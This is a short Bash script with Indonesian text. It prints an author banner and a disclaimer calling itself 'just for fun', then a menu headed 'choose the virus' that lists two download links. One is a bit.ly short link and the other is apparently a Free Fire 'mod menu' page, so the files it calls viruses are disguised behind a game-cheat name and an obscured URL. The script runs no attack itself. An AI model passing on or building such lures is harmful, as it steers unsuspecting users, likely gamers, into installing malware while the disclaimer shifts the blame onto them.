red="\e[91m"
rset="\e[0m"
grn="\e[92m"
ylo="\e[93m"
blue="\e[94m"
cyan="\e[96m"
pink="\e[95m"
echo ""
echo -e "$blue========================"
echo -e "$grn[+] coded by Habibie Af"
echo -e "$grn[+] github by alfrzy10"
echo -e "$blue========================="
echo ""
echo -e "$red Script ini ditujukan hanya untuk bersenang-senang"
echo -e "$red Jika pengguna sengaja menginstall Program di bawah"
echo -e "$red Admin tidak bertannggung jawab akan Resikonya"
echo -e "$red Becareful!!"		
echo  ""
echo -e "$cyan | Pilih Virusnya |"
echo ""
read -p "tekan Enter untuk melanjutkan : "
echo ""
echo -e "$red - https://bit.ly/3ild93L"
echo -e "$red - http://ffmodmenu.page.link/LatestMODMENU"
echo ""
read -p "$grnKetik Exit : "
echo ""
echo  "		 	bye bye "
	     
